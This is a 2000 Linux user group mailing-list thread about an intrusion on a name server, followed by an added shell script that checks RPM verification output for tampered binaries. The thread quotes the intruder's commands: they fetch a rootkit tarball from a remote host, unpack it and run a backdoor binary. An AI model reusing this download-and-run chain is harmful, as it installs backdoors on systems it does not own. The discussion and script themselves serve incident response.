[lug] What does this mean?

nunar at mauromedia.net nunar at mauromedia.net
Tue Mar 21 00:41:41 MST 2000


What exactly is a rootkit?


> ** Original Subject: RE: [lug] What does this mean?
> ** Original Sender: Tkil <tkil at scrye.com>
> ** Original Date: Tue, 21 Mar 2000 00:34:12 -0700

> ** Original Message follows... 

>
> >>>>> "Shannon" == nunar  <nunar at mauromedia.net> writes:
> 
> [reformatted for sanity]
> 
> Shannon> I was going through my name server and somebody had entered this:
> Shannon> #   cd /tmp; \
> Shannon> 	rcp disaus at linux7.europop.de:/dev/sdd0 ak.tgz; \
> Shannon> 	echo "* downloaded "; \
> Shannon> 	tar xfz ak*; \
> Shannon> 	cd ak; \
> Shannon> 	./backdoor/ls; \
> Shannon> 	cd ..; \
> Shannon> 	rm -rf ak*; \
> Shannon> 	exit
> 
> note that the only line which actually looks dangerous is the
> "./backdoor/ls" one; everything else should be pretty polite.
> (although, if they already have root... ouch.)
> 
> Shannon> Does anybody know what this is doing to my system?
> 
> short version: someone tried to run a rootkit against your box.  i
> can't tell offhand whether or not they succeeded, but you should
> probably "rm -rf /tmp/backup" at the very least.
> 
> jafo says:  if you are running redhat, check the MD5 sums of all the
> packages on the box (this is an option to 'rpm'; consult the man page,
> but "--verify" should be close...)
> 
> jafo also says:  consult the most excellent linux security howto.  (hi
> kev!)  accessible at:
> 
>    http://www.tummy.com/security-howto/
> 
> prepare to do a backup of important data (e.g. your named config
> files) and possibly do a full reinstall.  be absolutely sure you are
> running the latest versions of named and friends (BIND-*).  also,
> don't do a blind copy of the named config files; double-check that
> nobody is using your server who shouldn't be.
> 
> t.
> 
> _______________________________________________
> Web Page:  http://lug.boulder.co.us
> Mailing List: http://lists.lug.boulder.co.us/mailman/listinfo/lug

>** --------- End Original Message ----------- **

> 
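
The package check suggested in the quoted reply, sketched as an added example that is not part of the original thread: it triages `rpm -Va` output for non-config files whose digest no longer matches the package database, plus files that have gone missing. The function names and the sample output are constructed for illustration, and the flag-string layout assumed is the one rpm prints (digest mismatch shown as `5` in the third column).

```shell
#!/bin/sh
# Added example (not from the thread): triage `rpm -Va` output.
# On a real host the input would come from:  rpm -Va | suspicious_files

# Constructed sample of `rpm -Va` output, embedded so the script runs offline.
sample_verify_output() {
cat <<'EOF'
S.5....T.  c /etc/named.conf
S.5....T.    /bin/ls
.......T.    /usr/bin/less
missing      /usr/sbin/lsof
..5......    /bin/ps
.M.......    /usr/bin/top
EOF
}

# Reads rpm verify output on stdin and prints one finding per line:
#   DIGEST <path>   file content differs from what the package shipped
#   MISSING <path>  packaged file is no longer on disk
# Config files (attribute marker "c") are skipped because they are
# expected to change. Assumes paths contain no whitespace.
suspicious_files() {
  awk '
    $1 == "missing" { print "MISSING " $NF; next }
    # Field 1 is the flag string; character 3 is "5" on a digest mismatch.
    substr($1, 3, 1) == "5" {
      if (NF == 3 && $2 == "c") next
      print "DIGEST " $NF
    }'
}

# Stand-alone run against the constructed sample.
sample_verify_output | suspicious_files
```

A changed digest on something like `/bin/ls` or `/bin/ps` is the signal worth chasing here; timestamp-only or mode-only differences are not reported. If the box may already be compromised, the rpm binary and its database are suspect too, so the verification is more trustworthy when run from known-good media.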


